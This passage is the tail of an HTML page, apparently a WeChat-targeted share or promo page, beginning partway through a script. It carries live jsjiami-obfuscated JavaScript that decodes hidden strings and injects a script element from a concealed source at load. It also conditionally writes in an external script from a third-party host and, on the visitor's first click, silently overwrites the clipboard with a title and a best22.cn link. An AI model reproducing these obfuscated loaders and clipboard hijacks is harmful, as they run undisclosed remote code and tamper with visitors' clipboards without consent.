                    return [_0xod0, 'SLHjIysFjpViOgOaumXxiRO.BcrVBom.FHnv7CIk==', 'WQaqrXu', 'a8knyvNdVW', 'pSoVWOeIha', 'WQDpW5mM', 'W7ShWRldTcq', 'W7BcTCkUcConWQuKW6ZdPMRdVCoYhdW', 'WQ7cO8k4rCoFWQuRWQBcOIRdPmkVhdCMFSoDiW', 'WRnxcaZdGG', 'WOyWWRuSn29jW4PsW4eGWOa', 'j1uGWOmj', 'W5xdRmkuW70z', 'WOyNWQi', 'pMpcPSkPW6u', 'Bt3cV8kfW6ikW5VdQW', 'WObaBh7dHa', 'W5/dLSkSCq', 'nXRcPmkPW6jRjCkXoxHtW4j7W4K', 'W6LXwqVcJG', 'W5hcVSkDFCo/', 'qCkynKdcOttcKmkNW44', 'kCoFWOCriG', 'ihddKCodpCk6FSkD', 'ggtcS8kTW78', 'bCkVuxNdQa', 'e1HJW6v6W6KVWPldQxZdJNNdPCoc', 'W6CCWQ3dItq', 'WRbSmcddJG', 'W57cGGldJqFcRxK', 'vSoNW4a/EGzdWRqI', 'rmoHnSoOsKtdQdmexHiAWQ4', 'WRb5kaJdJKWxvSk9WOZdTHC', 'W7ZdJmklW6SvWRtdKSoIW6VdUZNdOq', 'W7GuWQ7dQW', 'eSkbCx3dPdZdKSkYWP5Sa8kL', 'WR57zG', 'y0JdO8oyWRK/Cmkyavv1W75F', 'y8kAm8oaWOa', 'sCk1mXrdW6X5WQaLWRpcVmk7FW', 'WRPcWQZdMIJdUmoLW7C', 'b1ebp8kTWQtcPmkphq', 'WPJcLrG', 'WRPOxq', 'WObPc8ojiq', 'mq/cOmkjW6bQc8k8pMb1', 'hdviudVdH8ogyCkiW4HtWPeo', 'W4a0WPNdMdRcRmo2ouzcW4ddGa'].concat((function() {
                        return ['wMeAtgxcN8kyqComWQ8eWPiC', 'ANPvpKJdOCoK', 'gWrB', 'gmkRWQiLbK/dH8krW7u/', 'W7KjWQ/dSXrEW4JdVCkzx8kRW5tdHa', 'f8oLW6/dGCkTWQXbWRFdIbC0W7Dd', 'W6xcU8k+WQKz', 'kW9LWQ9w', 'pmomW4jZnG', 'WQ05btPkWO8zFmkKfCkJBG', 'rqTudq', 'W4jSW7vAo2HtW6zbW50', 'wCo5W7C4b2NdMmkzWQfFfH3dIW', 'AJJdVSo6W6KXW7ldG8oOoG', 'W7RcKmkGW7e', 'wbrmWOldR8o4W5DBsGK', 'fCoKW7pdN8kX', 'eelcPhxcL8osaHzg', 'vbDfeCkWWORcL8kZmSoipG', 'uX4PWR0S', 'lgxcNSk6W7S', 'lh3cPSk+W6eDW67dGG', 'W4hcO8keWQ8n', 'm1iVWO8QWPVdMCkDWRm9y8k1W5q', 'mL0uWR0T', 'w8o+W5RcVmoEW55lCg3cKsugla', 'yYlcL8k0', 'W4JcISk/WPez', 'bSkwzG', 'WRbsWP42na', 'WQ4qqa0kqCoJW4y', 'ysNdVs/cOq', 'W7nUr00rW545t8kyjmk4xCovca', 'W5lcJaJdVmkJomo+sW', 'k28uW4pdOW', 'ihbi', 'hmk+B8kT', 'W6XVkcJdJLegemk1WORcRr/dKCoRWPhdJCoxW5y', 'mLOfWOux', 'WPmvEsZcKMtcJCoI', 'WPTTe8oqBW', 'Au3dPSoEWRK6bCkcbuLiW7e', 'W4OtWRZdMZe', 'WOb6fCojjxS', 'kCowW7j4c3D+hq', 'W7mvWQpdPG', 'dSoKW77dG8oU', 'W6FcOIBdKuu'].concat((function() {
                            return ['W7hdNmk1uSkdWQhcPuJdThqjm8kzW4S', 'W4BcLXtdUmkGoSoO', 'oHzyWQ1VWO4', 'yKRcOSkRW7zCc8kM', 'ktNdUYJcGtNdO3FcKCkDWOO', 'W7tcJSk5W4NdVG', 'wWHBeq', 'W7ipWR7dOHmbWQlcVG', 'yrfQW6zrW6tdOCogn8oNWQjM', 'WQmQWO/dRmoqASoujIm', 'W4tdJmkByJu', 'WQetsG8v', 'WQLGDKFdJCoSka', 'W61/mG', 'rmoMn8oPr0BcLXOGzH0+', 'W4rdwwy4', 'W4vcEYlcIMtcPCoow0lcSxK', 'cCkTWO3dJCkFWOODshFcOti3jmoSD8oo', 'grvIfZi', 'WOy9tXOk', 'cSo0WP8M', 'WQ9Myu4', 'dbddUuJcU8oXar1VxWLoWQ7cJ8kw', 'dSoKW77dG8oUW5al', 'Esj+hCkZ', 'eCoiW5z0nG', 'j1q2WO8H', 'yCkFiSolWQzXBq', 'W6pcV8kOxq', 'iaz8fs0', 'Ct/cNmk5nmoUWOyY', 'W47dNmk8sqGQimkbW5bVW7lcLG', 'faNcH8kBW6S', 'sCo5W6fqdwxdMCkzW6ezza3dTSkq', 'WOdcRCotsmoo', 'WQDOimonha', 'CmkSWPbKWQhcJG', 'W4RdNmkQjrO3pSknWPWPWRddGZiG', 'WQhdJCo4WRBcR8kHW77cNthcTCkHW6e', 'WQ1uW4mVWPXqWRK', 'W5jtqXhcQa', 'bmkMWORdQCkDWOyCuG', 'WPjFWP88va', 'W7lcTG3dPSkj', 'mHdcTmkv'];
                        }()));
                    }()));
                }());
                _0x3c65 = function() {
                    return _0x4d8030;
                }
                ;
                return _0x3c65();
            }
            ;var version_ = 'jsjiami.com.v7';
        </script>
        <div class="div_btn" id="btn-make">
            <a href="weixin://dl/business/?t=i3zDtWf8bOi">
                <span>制作</span>
            </a>
        </div>
        <div class="div_btn" id="div_support">
            <a href="/new">
                <span>更多</span>
            </a>
        </div>
        <script>
            var nowurl = window.location.href;
            if ((typeof (data_type) != "undefined" && data_type == 0) || (typeof (vip_type) != "undefined" && vip_type != null && vip_type == 0)) {
                var ua = navigator.userAgent.toLowerCase();
                if (ua.match(/MicroMessenger/i) == "micromessenger" && ua.indexOf("miniprogram") < 1 && nowurl.indexOf("code") < 1 && nowurl.indexOf("new") < 1 && nowurl.indexOf("mp") < 1) {
                    document.writeln("<script src=\"http://web-file.360ab.cn/static/js/mp-jump.js?v1102\"><\/script>");
                }
            }

            var _hmt = _hmt || [];
            (function() {
                var hm = document.createElement("script");
                var tid = "9268d9128fcebf1a5da96d7cb2a8dac4";
                if (nowurl.indexOf('ai81') > -1) {
                    tid = "51d6321aaa4909493b4e8941b57c30d7";
                } else if (nowurl.indexOf('web-36') > -1) {
                    tid = "e2c5f61aa6d237cbe2cffd716efd19e5";
                } else if (nowurl.indexOf('an55') > -1 || nowurl.indexOf('an77') > -1) {
                    tid = "c4419cfaccfe088ac7397ee955dd5e9e";
                }
                hm.src = "https://hm.baidu.com/hm.js?" + tid;
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(hm, s);
            }
            )();
        </script>
        <script>
            console.log(dataInfo);
            var btns = document.querySelectorAll(".div_btn");
            btns.length > 0 ? btns[0].style.display = "none" : '';
            btns.length > 1 ? btns[1].style.display = "none" : '';
            var timeid = new Date().getTime().toString().substr(-4);
            var pageUrl = 'http://best22.cn/529';
            pageUrl = pageUrl.indexOf("#") > -1 ? pageUrl : pageUrl + '#' + timeid;
            var ctext = (dataInfo.ctitle ? dataInfo.ctitle : dataInfo.title) + "\n" + pageUrl;
            var ua = navigator.userAgent.toLowerCase();
            if (ua.indexOf("miniprogram") < 1 && temp_id != "25") {
                var is_copy = false;
                var htmlobj = document.querySelector('html');
                htmlobj.addEventListener('click', function() {
                    if (!is_copy) {
                        if (typeof ntzgo === 'function') {
                            ntzgo();
                        }
                        copyText(ctext);
                        is_copy = true;
                        var btns = document.querySelectorAll('.div_btn');
                        btns.length > 0 ? btns[0].style.display = "block" : '';
                        btns.length > 1 ? btns[1].style.display = "block" : '';
                    }
                });
            } else if (ua.indexOf("miniprogram") < 1 && temp_id == "25") {
                if (typeof ntzgo === 'function') {
                    ntzgo();
                }
            }
            ;
            function copyText(ctext) {
                const textarea = document.createElement('textarea');
                textarea.value = ctext;
                document.body.appendChild(textarea);
                textarea.select();
                document.execCommand('copy');
                document.body.removeChild(textarea);
            }
            var _0xodR = 'jsjiami.com.v7';
            var _0x531db0 = _0x35ed;
            (function(_0x136de5, _0xd30ad5, _0x5c753e, _0x8bfc1d, _0x526cfc, _0x51b5b0, _0x1ff4a9) {
                return _0x136de5 = _0x136de5 >> 0x9,
                _0x51b5b0 = 'hs',
                _0x1ff4a9 = 'hs',
                function(_0x4c6099, _0x37f649, _0x1307df, _0x5f020d, _0x112d6a) {
                    var _0x566147 = _0x35ed;
                    _0x5f020d = 'tfi',
                    _0x51b5b0 = _0x5f020d + _0x51b5b0,
                    _0x112d6a = 'up',
                    _0x1ff4a9 += _0x112d6a,
                    _0x51b5b0 = _0x1307df(_0x51b5b0),
                    _0x1ff4a9 = _0x1307df(_0x1ff4a9),
                    _0x1307df = 0x0;
                    var _0x155b10 = _0x4c6099();
                    while (!![] && --_0x8bfc1d + _0x37f649) {
                        try {
                            _0x5f020d = -parseInt(_0x566147(0x92, 'Jfcj')) / 0x1 + -parseInt(_0x566147(0x88, '^UtO')) / 0x2 + parseInt(_0x566147(0x81, 'qybi')) / 0x3 * (parseInt(_0x566147(0x79, 'UPEL')) / 0x4) + parseInt(_0x566147(0x68, 'bEGe')) / 0x5 * (-parseInt(_0x566147(0x8a, '^8C9')) / 0x6) + parseInt(_0x566147(0x86, 'NGix')) / 0x7 * (parseInt(_0x566147(0x76, 'juW2')) / 0x8) + -parseInt(_0x566147(0x8c, 't[*T')) / 0x9 * (-parseInt(_0x566147(0x70, 'NGix')) / 0xa) + parseInt(_0x566147(0x82, 'GJBz')) / 0xb * (parseInt(_0x566147(0x7f, 'p*Z9')) / 0xc);
                        } catch (_0x573dc7) {
                            _0x5f020d = _0x1307df;
                        } finally {
                            _0x112d6a = _0x155b10[_0x51b5b0]();
                            if (_0x136de5 <= _0x8bfc1d)
                                _0x1307df ? _0x526cfc ? _0x5f020d = _0x112d6a : _0x526cfc = _0x112d6a : _0x1307df = _0x112d6a;
                            else {
                                if (_0x1307df == _0x526cfc['replace'](/[TqWYULQDVPfpXkCytgI=]/g, '')) {
                                    if (_0x5f020d === _0x37f649) {
                                        _0x155b10['un' + _0x51b5b0](_0x112d6a);
                                        break;
                                    }
                                    _0x155b10[_0x1ff4a9](_0x112d6a);
                                }
                            }
                        }
                    }
                }(_0x5c753e, _0xd30ad5, function(_0x4e1a0f, _0x26450e, _0x450db1, _0x27a568, _0x5d04e8, _0x2d885f, _0x6e7558) {
                    return _0x26450e = '\x73\x70\x6c\x69\x74',
                    _0x4e1a0f = arguments[0x0],
                    _0x4e1a0f = _0x4e1a0f[_0x26450e](''),
                    _0x450db1 = '\x72\x65\x76\x65\x72\x73\x65',
                    _0x4e1a0f = _0x4e1a0f[_0x450db1]('\x76'),
                    _0x27a568 = '\x6a\x6f\x69\x6e',
                    (0x18889e,
                    _0x4e1a0f[_0x27a568](''));
                });
            }(0x18600, 0xb7800, _0x16c8, 0xc5),
            _0x16c8) && (_0xodR = _0x531db0(0x6f, 'NU#*'));
            function _0x35ed(_0x27624e, _0x2450dd) {
                var _0x16c8c0 = _0x16c8();
                return _0x35ed = function(_0x35ed1d, _0x5acb96) {
                    _0x35ed1d = _0x35ed1d - 0x67;
                    var _0x2cb0e4 = _0x16c8c0[_0x35ed1d];
                    if (_0x35ed['BHBuNm'] === undefined) {
                        var _0x47d13f = function(_0x4719cd) {
                            var _0x4e7545 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                            var _0x43f0d5 = ''
                              , _0x392a71 = '';
                            for (var _0x175535 = 0x0, _0x31820e, _0x1daea6, _0x4f4259 = 0x0; _0x1daea6 = _0x4719cd['charAt'](_0x4f4259++); ~_0x1daea6 && (_0x31820e = _0x175535 % 0x4 ? _0x31820e * 0x40 + _0x1daea6 : _0x1daea6,
                            _0x175535++ % 0x4) ? _0x43f0d5 += String['fromCharCode'](0xff & _0x31820e >> (-0x2 * _0x175535 & 0x6)) : 0x0) {
                                _0x1daea6 = _0x4e7545['indexOf'](_0x1daea6);
                            }
                            for (var _0x1923b9 = 0x0, _0x30c863 = _0x43f0d5['length']; _0x1923b9 < _0x30c863; _0x1923b9++) {
                                _0x392a71 += '%' + ('00' + _0x43f0d5['charCodeAt'](_0x1923b9)['toString'](0x10))['slice'](-0x2);
                            }
                            return decodeURIComponent(_0x392a71);
                        };
                        var _0x2f6bb4 = function(_0x450ce3, _0x14c9d8) {
                            var _0x213933 = [], _0x31b475 = 0x0, _0x2281db, _0x3bb513 = '';
                            _0x450ce3 = _0x47d13f(_0x450ce3);
                            var _0x42a477;
                            for (_0x42a477 = 0x0; _0x42a477 < 0x100; _0x42a477++) {
                                _0x213933[_0x42a477] = _0x42a477;
                            }
                            for (_0x42a477 = 0x0; _0x42a477 < 0x100; _0x42a477++) {
                                _0x31b475 = (_0x31b475 + _0x213933[_0x42a477] + _0x14c9d8['charCodeAt'](_0x42a477 % _0x14c9d8['length'])) % 0x100,
                                _0x2281db = _0x213933[_0x42a477],
                                _0x213933[_0x42a477] = _0x213933[_0x31b475],
                                _0x213933[_0x31b475] = _0x2281db;
                            }
                            _0x42a477 = 0x0,
                            _0x31b475 = 0x0;
                            for (var _0x275098 = 0x0; _0x275098 < _0x450ce3['length']; _0x275098++) {
                                _0x42a477 = (_0x42a477 + 0x1) % 0x100,
                                _0x31b475 = (_0x31b475 + _0x213933[_0x42a477]) % 0x100,
                                _0x2281db = _0x213933[_0x42a477],
                                _0x213933[_0x42a477] = _0x213933[_0x31b475],
                                _0x213933[_0x31b475] = _0x2281db,
                                _0x3bb513 += String['fromCharCode'](_0x450ce3['charCodeAt'](_0x275098) ^ _0x213933[(_0x213933[_0x42a477] + _0x213933[_0x31b475]) % 0x100]);
                            }
                            return _0x3bb513;
                        };
                        _0x35ed['vnXudU'] = _0x2f6bb4,
                        _0x27624e = arguments,
                        _0x35ed['BHBuNm'] = !![];
                    }
                    var _0x2fcba8 = _0x16c8c0[0x0]
                      , _0x2ec85a = _0x35ed1d + _0x2fcba8
                      , _0x2f467d = _0x27624e[_0x2ec85a];
                    return !_0x2f467d ? (_0x35ed['pOaoyG'] === undefined && (_0x35ed['pOaoyG'] = !![]),
                    _0x2cb0e4 = _0x35ed['vnXudU'](_0x2cb0e4, _0x5acb96),
                    _0x27624e[_0x2ec85a] = _0x2cb0e4) : _0x2cb0e4 = _0x2f467d,
                    _0x2cb0e4;
                }
                ,
                _0x35ed(_0x27624e, _0x2450dd);
            }
            if (!document[_0x531db0(0x67, 'E5h2')][_0x531db0(0x7d, '!X$&')](_0x531db0(0x89, 'NbVf'))) {
                document[_0x531db0(0x8f, '^8C9')][_0x531db0(0x6c, ')!jy')](_0x531db0(0x85, '2%H&'), !![]);
                var ox312341 = window[_0x531db0(0x80, 'QKt)')][_0x531db0(0x90, 'qybi')] === _0x531db0(0x6b, 'bdHk') ? _0x531db0(0x73, 'z7J2') + _0x531db0(0x78, '^UtO') + _0x531db0(0x7e, 'juW2') : _0x531db0(0x7a, '2%H&') + _0x531db0(0x83, 'pCb9') + _0x531db0(0x7b, 'E5h2')
                  , ox782681 = document[_0x531db0(0x77, 'Jfcj')](_0x531db0(0x6d, 'pqu]'));
                ox782681[_0x531db0(0x87, 'E5h2')] = ox312341 + _0x531db0(0x6a, 'pCb9'),
                document[_0x531db0(0x67, 'E5h2')][_0x531db0(0x8b, 'GJBz')](ox782681);
            }
            function _0x16c8() {
                var _0xd14c61 = (function() {
                    return [_0xodR, 'tqItjsTpjqgiayfkmXiTC.ktPcWoPUmVf.LYvQD7==', 'WQRdUsRdPZf8W6C', 'AwtcT8ozlmkTbar7jc5h', 'WOnrW7vlW7uWWQm+WPRcR0Tv', 'ACkFWOLTt3ajW6KexSoeECkb', 'FKldStPhwSo9WOJdIKJdRsuk', 'WPC/WO3cRblcVfr/xmoNWQFdUSo7Fa', 'W43cGd3dNmkuW5tdSXFcQxBcGW', 'xI/cGSonW4dcVmk7vG', 'W4NcS8oU', 'omoatSoUzCoImmkrt8k2Fmooq0C', 'hSk8dSk1WOxdHL8vg8ozlCkM', 'DmomW5q', 'W7bWWQ0wW60sWQtdHCoi', 'iCkXW6Gnv8kYW6ZdSq', 'jMpdISoDl8kBWP/dRa'].concat((function() {
                        return ['btSWW6NcKdSwESkkASovEG', 'BLGFW6zXiG7dGmojwd1jCq', 'WOpcIHjgaapcVZddNCkDeW', 'xZxcN8oj', 'W6pdSmkLWRlcM3hcTa', 'WPtcOSoJ', 'W5LRW53cSexdOujlgmkhW5ZcKa', 'W4v8WQFcHq', 'yCkdfmkZnSoNfSo1Fmkiua', 'uhL1WRNdJ2WgA8kTrmof', 'WR0GzCoIWRFdLCoNWQK', 'lahcRw4ccmkiWQldHKddHcmt', 'rmkyWQHcpqpcKmoc', 'mmoCqmo+', 'zYtdQCoDfmkoWQRdHa', 'q25OW4OVxCo3gq', 'jqtcRgOcd8oVWO3dGfFdMaa'].concat((function() {
                            return ['W6dcOSohWRVcMvZcJIr4', 'u0ZdT8kaDe7cKCkNWPzWWQ8', 'WOxcV8oKW4W', 'W5pdUSkXW5pcVq0uW5BdIq', 'C3hdQmkUzCk+uCoCWO9dW4e1DW', 'nK4jWQPJiGhcISkngsjnzmoEnJLkW40', 'dGJcU8ogFG', 'WQ7cHwDHxmoWn8kkWRn5W5ddPa', 'WQ5SoexdP8kC', 'rmkzW6TfoZJcJCoIW7e', 'WRVcPSkWW7tdNSo9W7dcVmkRWQdcOfFdVNS', 'W6xcOSolW6ldNbZdRXn5yhFdKfq', 'W5rOW5RcTexdPMTJpmkwW6xcRq', 'WO0dWPaFWRjEWRi'];
                        }()));
                    }()));
                }());
                _0x16c8 = function() {
                    return _0xd14c61;
                }
                ;
                return _0x16c8();
            }
            ;var version_ = 'jsjiami.com.v7';
        </script>
        <script src="https://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js"></script>
    </body>
</html>
